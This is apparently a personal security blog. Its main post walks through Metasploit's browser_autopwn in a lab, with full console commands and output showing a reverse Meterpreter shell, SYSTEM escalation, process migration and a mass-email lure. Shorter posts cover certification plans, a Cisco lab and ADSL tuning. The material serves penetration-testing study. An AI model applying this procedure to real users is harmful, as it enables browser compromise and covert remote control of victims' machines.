browser exploitation with metasploit

After talking with a few people who have done the SANS: SEC560 (GPEN) course and challenging the exam myself, one thing I felt that was missing regarding metasploit was the browser exploitation features. With pentesting and exploitation in general focusing on client-side attacks now for a while I thought the course could probably benefit from something like this for pentesting. First you’ll need to start up metasploit and load the server/browser_autopwn module:

       =[ metasploit v3.4.1-dev [core:3.4 api:1.0]
+ -- --=[ 553 exploits - 264 auxiliary
+ -- --=[ 209 payloads - 23 encoders - 8 nops
       =[ svn r9403 updated 3 days ago (2010.06.03)

msf > use server/browser_autopwn
msf auxiliary(browser_autopwn) > show options

Module options:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   LHOST                        yes       The IP address to use for reverse-connect payloads
   SRVHOST     0.0.0.0          yes       The local host to listen on.
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                      no        The URI to use for this exploit (default is random)

From here, the only option we need to change in order to get some basic functionality working is the LHOST option. Ofcourse, unless you want to type out the long+random URIPATH string, you might want to change that also. Once those options are set, we can also run the exploit:

msf auxiliary(browser_autopwn) > set URIPATH testing
URIPATH => testing
msf auxiliary(browser_autopwn) > set LHOST 192.168.0.22
LHOST => 192.168.0.22
msf auxiliary(browser_autopwn) > exploit
[*] Auxiliary module execution completed

[*] Starting exploit modules on host 192.168.0.22...
[*] ---

[*] Starting exploit multi/browser/firefox_escape_retval with payload generic/shell_reverse_tcp

[*] Using URL: http://0.0.0.0:8080/90Yiozy7u9n
[*]  Local IP: http://192.168.0.22:8080/90Yiozy7u9n
[*] Server started.
[*] Starting exploit multi/browser/mozilla_compareto with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/xGIjmqty
[*]  Local IP: http://192.168.0.22:8080/xGIjmqty
[*] Server started.

<- cut ->

[*] Starting handler for windows/meterpreter/reverse_tcp on port 3333
[*] Starting handler for generic/shell_reverse_tcp on port 6666
[*] Started reverse handler on 192.168.0.22:3333
[*] Starting the payload handler...
[*] Started reverse handler on 192.168.0.22:6666
[*] Starting the payload handler...

[*] --- Done, found 15 exploit modules

[*] Using URL: http://0.0.0.0:8080/testing
[*]  Local IP: http://192.168.0.22:8080/testing
[*] Server started.

Now on our client we browse to the URL listed above as the ‘Local IP’. In this case it would be http://192.168.0.22:8080/testing. Once that is done, you can check the metasploit console window and you will see:

[*] Request '/testing' from 192.168.0.5:64865
[*] Request '/testing?sessid=V2luZG93czpWaXN0YTp1bmRlZmluZWQ6ZW4tdXM6eDg2Ok1TSUU6Ny4wOg%3d%3d' from 192.168.0.5:64865
[*] JavaScript Report: Windows:Vista:undefined:en-us:x86:MSIE:7.0:
[*] Responding with exploits
[*] Sending Internet Explorer 7 Uninitialized Memory Corruption Vulnerability to 192.168.0.5:64866...
[*] Sending stage (748032 bytes) to 192.168.0.5
[*] Meterpreter session 1 opened (192.168.0.22:3333 -> 192.168.0.5:64867) at Sun Jun 06 12:25:01 +1000 2010

msf auxiliary(browser_autopwn) > sessions -l

Active sessions
===============

  Id  Type         Information                   Connection
  --  ----         -----------                   ----------
  1   meterpreter  vistavm\testadmin @ VISTAVM  192.168.0.22:3333 -> 192.168.0.5:64867

msf auxiliary(browser_autopwn) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > use priv
Loading extension priv...success.

meterpreter > getsystem
...got system (via technique 1).

meterpreter > idletime
User has been idle for: 2 mins 46 secs
meterpreter >

Now, how would you go about getting clients/victims to visit this in a pentest? Doing an organisation wide mass email is probably the easiest way. Also if you start the msfconsole session as root you can change the server destination port to port 80 provided nothing else is listening on that port.

You will also likely want to migrate to a more stable process within meterpreter incase the user closes down their browser. Under meterpreter check for stable running processes (for example, winlogon or lsass) and run ‘migrate ‘ so your session stays connected.

GPEN passed

The goal for the next year is to pass the GIAC GSE (GIAC Security Expert) by probably visiting Vegas (again!) next year. The GSE has a few pre-requisites in the form of GCIH, GCIA, GSE and 2 ‘electives’ (other GIAC exams). Since I passed the GPEN exam which will be an elective, I need to focus on getting the 3 cores done which will probably be GCIH first, then tackle GSEC and GCIA.

As all this is self funded i’ll likely just be reading books on the various topics rather than the actual GIAC material, but we’ll see how that pans out.

Packet Life Community Lab

Thinking of doing a specific Cisco certification (CC[NA|NP|IP|IE])? Then you might be interested in the Community Lab provided by Packet Life.

The ‘Community Lab’ is is divided up into 2 blocks with the same equipment. You are able to book one block of equipment or both for free of charge. Bookings seem to be booked well up into March currently, so it might be a while before you can get access.

Donations are encouraged, but not required in order to get access. Definitely an option if you can’t afford the lab prices offered by the various vendors to get some lab time.

ADSL issues

I recently changed ISPs to a cheaper plan (not by much) which provides more quota (about 40gb) per month than what I was getting from my previous provider. Along with this, I went to the 8Mb DSL plan where as previously I was on the 1.5Mb. When you start getting higher speeds, alot of other factors come into how stable your connection is.  Before I made any changes, my atm0/0/0 interface was looking like:

Speed (kbps): 7300
Noise Margin: 6.0 dB

 

A noise margin of 6.0 dB turns out to be the bare minimum you would want to have as it’s the borderline for a stable connection and the connection from hell. As I have been having connection issues lately, I decided to do some googling. On a few sites I came across some undocumented cisco commands, one of which was “service internal”. Normally on an ATM interface you will see something like:

adsl-gw(config)#int atm0/0/0
adsl-gw(config-if)#dsl ?
enable-training-log enable the fw training log for Showtime and failure cases
lom Loss Of Margin watch counter for line retrain
operating-mode auto or specific ADSL mode

After going into config mode:
adsl-gw(config)#service internal
adsl-gw(config)#int atm0/0/0
adsl-gw(config-if)#dsl ?
enable-training-log enable the fw training log for Showtime and failure cases
gain-setting ADSL programmable gain setting
lom Loss Of Margin watch counter for line retrain
max-tone-bits set maximum bits per tone limit
noise-margin set noise margin offset
operating-mode auto or specific ADSL mode
power-cutback Noise Threshold for Power CutBack

Voila. The setting I wanted to play with was the noise-margin. After setting the noise margin with “dsl noise-margin 2″ (settings between -3 and 3 accepted, the higher (3) the better) my DSL stats now say:

Noise Margin: 7.5 dB
Speed (kbps): 6592

The noise-margin seems to go between 7.5 and 9 which is optimal. The other setting I can try is increasing the noise-margin to 3, however I will sync at around 6200 once that’s done.

More undocumented Cisco commands here, here and here.